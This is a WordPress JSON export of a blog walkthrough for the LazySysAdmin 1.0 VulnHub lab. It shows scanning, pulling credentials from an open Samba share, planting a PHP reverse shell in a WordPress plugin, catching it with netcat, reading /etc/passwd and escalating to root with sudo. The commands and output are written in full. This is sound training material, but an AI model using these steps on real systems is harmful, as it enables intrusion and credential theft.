{"id":60,"date":"2017-10-23T21:48:53","date_gmt":"2017-10-24T02:48:53","guid":{"rendered":"https:\/\/blog.lamarranet.com\/?p=60"},"modified":"2019-08-28T10:31:19","modified_gmt":"2019-08-28T14:31:19","slug":"lazysysadmin-1-0-walkthrough","status":"publish","type":"post","link":"https:\/\/blog.lamarranet.com\/index.php\/lazysysadmin-1-0-walkthrough\/","title":{"rendered":"LazySysAdmin 1.0 Walkthrough"},"content":{"rendered":"

\n\tThis is a walkthrough of the LazySysAdmin 1.0 VM. You can download it from here: https:\/\/www.vulnhub.com\/entry\/lazysysadmin-1,205\/<\/a>\n<\/p>\n

\n\tMy Kali machine has the IP 10.10.1.2 and is connected to the VM on a host-only network.\n<\/p>\n

\n\tScanning
\n<\/h1>\n

\n\tLet's find the IP address of our target:\n<\/p>\n

\r\nroot ~ # netdiscover -i eth1 -r 10.10.1.0\/24\r\n\r\n Currently scanning: 10.10.1.0\/24   |   Screen View: Unique Hosts\r\n\r\n 3 Captured ARP Req\/Rep packets, from 3 hosts.   Total size: 180\r\n _________________________________________________________________________\r\n   IP            At MAC Address     Count     Len  MAC Vendor \/ Hostname\r\n -------------------------------------------------------------------------\r\n 10.10.1.1       00:50:56:c0:00:01      1      60  Unknown vendor\r\n 10.10.1.29      00:0c:29:a4:cd:ab      1      60  Unknown vendor<\/pre>\n
\n\t
\n\tNow for portscanning:\n<\/p>\n
\r\nroot ~ # nmap -sV -O 10.10.1.29\r\n\r\nStarting Nmap 7.60 ( https:\/\/nmap.org ) at 2017-10-22 22:07 CDT\r\nNmap scan report for 10.10.1.29\r\nHost is up (0.00075s latency).\r\nNot shown: 994 closed ports\r\nPORT     STATE SERVICE     VERSION\r\n22\/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8\r\n80\/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))\r\n139\/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)\r\n445\/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)\r\n3306\/tcp open  mysql       MySQL (unauthorized)\r\n6667\/tcp open  irc         InspIRCd\r\nMAC Address: 00:0C:29:A4:CD:AB (VMware)\r\nDevice type: general purpose\r\nRunning: Linux 3.X|4.X\r\nOS CPE: cpe:\/o:linux:linux_kernel:3 cpe:\/o:linux:linux_kernel:4\r\nOS details: Linux 3.2 - 4.8<\/pre>\n
\n\t
\n\tEnumeration
\n<\/h1>\n
\n\tSeeing that port 80 is open, the first thing I do is open a web browser & check it out:\n<\/p>\n
\n\t\"\"\n<\/p>\n
\n\tThere's really not much to this site. Lets use dirb without recursion (in case there's a lot of hits) and see what else we can find. I like to use the "big.txt" wordlist:\n<\/p>\n
\r\nroot ~ # dirb http:\/\/10.10.1.29\/ \/usr\/share\/dirb\/wordlists\/big.txt -r\r\n\r\n...snip...\r\n\r\n---- Scanning URL: http:\/\/10.10.1.29\/ ----\r\n==> DIRECTORY: http:\/\/10.10.1.29\/apache\/\r\n==> DIRECTORY: http:\/\/10.10.1.29\/javascript\/\r\n==> DIRECTORY: http:\/\/10.10.1.29\/old\/\r\n==> DIRECTORY: http:\/\/10.10.1.29\/phpmyadmin\/\r\n+ http:\/\/10.10.1.29\/robots.txt (CODE:200|SIZE:92)\r\n+ http:\/\/10.10.1.29\/server-status (CODE:403|SIZE:290)\r\n==> DIRECTORY: http:\/\/10.10.1.29\/test\/\r\n==> DIRECTORY: http:\/\/10.10.1.29\/wordpress\/\r\n==> DIRECTORY: http:\/\/10.10.1.29\/wp\/<\/pre>\n
\n\t
\n\tAnything good in the robots.txt file?\n<\/p>\n
\r\nroot ~ # curl http:\/\/10.10.1.29\/robots.txt\r\nUser-agent: *\r\nDisallow: \/old\/\r\nDisallow: \/test\/\r\nDisallow: \/TR2\/\r\nDisallow: \/Backnode_files\/\r\n<\/pre>\n
\n\t
\n\tI tried all the sites and they either didn't exist or had nothing interesting. Let's check out the WordPress site:\n<\/p>\n
\n\t\"\"\n<\/p>\n
\n\tAgain, not much here. Let's try to get some info from those open Samba ports (139 & 445):\n<\/p>\n
\r\nroot ~ # smbclient -L 10.10.1.29\r\nWARNING: The "syslog" option is deprecated\r\nEnter WORKGROUP\\root's password: \r\nOS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]\r\n\r\n\tSharename       Type      Comment\r\n\t---------       ----      -------\r\n\tprint$          Disk      Printer Drivers\r\n\tshare$          Disk      Sumshare\r\n\tIPC$            IPC       IPC Service (Web server)\r\nOS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]\r\n\r\n\tServer               Comment\r\n\t---------            -------\r\n\r\n\tWorkgroup            Master\r\n\t---------            -------\r\n\tWORKGROUP            LAZYSYSADMIN\r\n<\/pre>\n
\n\t
\n\tExploitation
\n<\/h1>\n
\n\tNow we're about to exploit a misconfiguration in the server.\n<\/p>\n
\n\tApparently, any username & a blank password will get us this info! Let's try connecting:\n<\/p>\n
\r\nroot ~ # smbclient \\\\\\\\10.10.1.29\\\\share$\r\nWARNING: The "syslog" option is deprecated\r\nEnter WORKGROUP\\root's password: \r\nOS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]\r\nsmb: \\> ls\r\n  .                                   D        0  Tue Aug 15 06:05:52 2017\r\n  ..                                  D        0  Mon Aug 14 07:34:47 2017\r\n  wordpress                           D        0  Tue Aug 15 06:21:08 2017\r\n  Backnode_files                      D        0  Mon Aug 14 07:08:26 2017\r\n  wp                                  D        0  Tue Aug 15 05:51:23 2017\r\n  deets.txt                           N      139  Mon Aug 14 07:20:05 2017\r\n  robots.txt                          N       92  Mon Aug 14 07:36:14 2017\r\n  todolist.txt                        N       79  Mon Aug 14 07:39:56 2017\r\n  apache                              D        0  Mon Aug 14 07:35:19 2017\r\n  index.html                          N    36072  Sun Aug  6 00:02:15 2017\r\n  info.php                            N       20  Tue Aug 15 05:55:19 2017\r\n  test                                D        0  Mon Aug 14 07:35:10 2017\r\n  old                                 D        0  Mon Aug 14 07:35:13 2017\r\n\r\n\t\t3029776 blocks of size 1024. 1225164 blocks available\r\n<\/pre>\n
\n\t
\n\tWow, a lazy sysadmin indeed. After downloading a bunch of files and checking the contents, there were only a couple of interest:\n<\/p>\n
\r\nsmb: \\> get deets.txt\r\ngetting file \\deets.txt of size 139 as deets.txt\r\nsmb: \\> cd wordpress\r\nsmb: \\wordpress\\> get wp-config.php\r\ngetting file \\wordpress\\wp-config.php of size 3703 as wp-config.php\r\nsmb: \\wordpress\\> exit\r\n\r\nroot ~ # cat deets.txt \r\nCBF Remembering all these passwords.\r\n\r\nRemember to remove this file and update your password after we push out the server.\r\n\r\nPassword 12345\r\n\r\nroot ~ # grep DB_ wp-config.php \r\ndefine('DB_NAME', 'wordpress');\r\ndefine('DB_USER', 'Admin');\r\ndefine('DB_PASSWORD', 'TogieMYSQL12345^^');\r\ndefine('DB_HOST', 'localhost');\r\ndefine('DB_CHARSET', 'utf8');\r\ndefine('DB_COLLATE', '');\r\n<\/pre>\n
\n\t
\n\tAs you can see, deets.txt gives us a password of "12345", no doubt to somebody's luggage. Though we don't have a username yet, we'll keep this in mind for later. We also managed to get the wp-config.php file, which contains credentials to the MySQL database.\n<\/p>\n
\n\tHoping for some password re-use, was able to log into the WordPress admin page (http:\/\/10.10.1.29\/wordpress\/wp-admin\/<\/a>) with these credentials!
\n\t\"\"\n<\/p>\n
\n\tI should be able to get a php reverse shell now. Going to the Plugins page, I edit the Hello Dolly plugin:
\n\t\"\"\n<\/p>\n
\n\tUsing a PHP reverse shell from pentestmonkey<\/a>, I modified the $ip and $port variables and replaced all the code in the plugin starting below the headers (so we don't get an error about invalid plugin headers) with the reverse shell php code. Click "Update File" and now we're ready to get a shell. Note: In an actual pentest, you would never delete portions of a client's website in any way. It would be better to download a plugin, modify it with your reverse shell, then upload it to the target site. This is just a quick & dirty shell.\n<\/p>\n
\n\tFirst, start a netcat listener:\n<\/p>\n
\r\nroot ~ # nc -lvp 1337\r\nlistening on [any] 1337 ...\r\n<\/pre>\n
\n\t
\n\tNow call the page:\n<\/p>\n
\r\nroot ~ # curl http:\/\/10.10.1.29\/wordpress\/wp-content\/plugins\/hello.php<\/pre>\n
\n\t
\n\tOn the netcat listener, we see our shell!\n<\/p>\n
\r\nconnect to [10.10.1.2] from (UNKNOWN) [10.10.1.29] 37906\r\nLinux LazySysAdmin 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU\/Linux\r\n 05:32:22 up 9 min,  0 users,  load average: 0.04, 0.06, 0.05\r\nUSER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT\r\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n\/bin\/sh: 0: can't access tty; job control turned off\r\n$\r\n<\/pre>\n
\n\t
\n\tI usually check for user accounts first when I get on a system:\n<\/p>\n
\r\n$ cat \/etc\/passwd\r\nroot:x:0:0:root:\/root:\/bin\/bash\r\n\r\n...snip...\r\n\r\ntogie:x:1000:1000:togie,,,:\/home\/togie:\/bin\/rbash\r\nsshd:x:104:65534::\/var\/run\/sshd:\/usr\/sbin\/nologin\r\nmysql:x:105:113:MySQL Server,,,:\/nonexistent:\/bin\/false\r\n<\/pre>\n
\n\t
\n\tPrivilege Escalation
\n<\/h1>\n
\n\tThat "togie" account is the only user on here. Let's try to switch to that account with the "12345" password found earlier. Here's the rest of the process:\n<\/p>\n
\r\n$ su togie\r\nsu: must be run from a terminal\r\n$ python -c 'import pty; pty.spawn("\/bin\/bash")'\r\nwww-data@LazySysAdmin:\/$ ssuu  ttooggiiee\r\n\r\nPassword: 12345\r\n\r\ntogie@LazySysAdmin:\/$ ssuuddoo  --ii\r\n\r\n[sudo] password for togie: 12345\r\n\r\nroot@LazySysAdmin:~# ccdd  \/\/rroooott\r\n\r\nroot@LazySysAdmin:~# llss\r\n\r\nproof.txt\r\n<\/pre>\n
\n\t
\n\tI'm really not sure why it was doubling everything like that. Regardless it still worked. As we can see, togie was in the sudoers file so privilege escalation wasn't much of a problem.<\/p>\n","protected":false},"excerpt":{"rendered":"
This is a walkthrough of the LazySysAdmin 1.0 VM. You can download it from here: https:\/\/www.vulnhub.com\/entry\/lazysysadmin-1,205\/ My Kali machine has the IP 10.10.1.2 and is connected to the VM on aContinue readingLazySysAdmin 1.0 Walkthrough<\/span><\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8],"tags":[],"class_list":["post-60","post","type-post","status-publish","format-standard","hentry","category-vulnhub"],"_links":{"self":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/60","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/comments?post=60"}],"version-history":[{"count":7,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/60\/revisions"}],"predecessor-version":[{"id":82,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/60\/revisions\/82"}],"wp:attachment":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/media?parent=60"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/categories?post=60"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/tags?post=60"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}